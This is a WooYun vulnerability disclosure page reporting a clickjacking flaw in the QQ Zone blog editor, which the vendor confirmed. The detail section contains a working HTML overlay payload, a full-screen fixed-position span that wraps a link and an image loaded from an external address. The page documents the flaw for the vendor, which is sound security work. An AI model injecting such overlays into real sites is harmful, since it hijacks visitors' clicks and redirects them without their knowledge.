当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2011-03688

漏洞标题:QQ空间 clickjacking 漏洞(暂定)

相关厂商:腾讯

漏洞作者: xiao.k

提交时间:2011-12-21 00:48

修复时间:2012-02-04 00:49

公开时间:2012-02-04 00:49

漏洞类型:URL跳转

危害等级:低

自评Rank:1

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2011-12-21: 细节已通知厂商并且等待厂商处理中
2011-12-21: 厂商已经确认,细节仅向厂商公开
2011-12-31: 细节向核心白帽子及相关领域专家公开
2012-01-10: 细节向普通白帽子公开
2012-01-20: 细节向实习白帽子公开
2012-02-04: 细节向公众公开

简要描述:

成因源自于日志编辑器,过滤不严.此clickjacking 主要是做劫持点击之用.ps:不知是否可以定为clickjacking 漏洞 ,还轻各位鉴定下

详细说明:

在日志中插入代码

<span style="position: fixed;top: 0px;left: 0.0px;z-index: 4000;width: 1300.0px;height: 1000.0px;color: rgb(0,0,0);"> <a target="_blank" href="http://baidu.com" data-mce-href="http://ppt.cc/ui2K"> <img src="http://qp.qq.com/cgi-bin/cgi_imgproxy?url=http%3A%2F%2F211.20.209.23%3A8888%2Frpm%2Fimg5000.php&amp;size=0" style="height: 870px; width: 870px;"> </a> </span>

漏洞证明:

http://user.qzone.qq.com/771044833/blog/1324394065

修复方案:

加强编辑器的过滤 :D 随便说下

版权声明:转载请注明来源 xiao.k@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:5

确认时间:2011-12-21 15:34

厂商回复:

thx

最新状态:

暂无


漏洞评价:

评论

  1. 2011-12-22 05:53 | xiao.k ( 路人 | Rank:10 漏洞数:2 | <a>hi</a>)

    其实我是为了公仔而来滴..可以求一个么?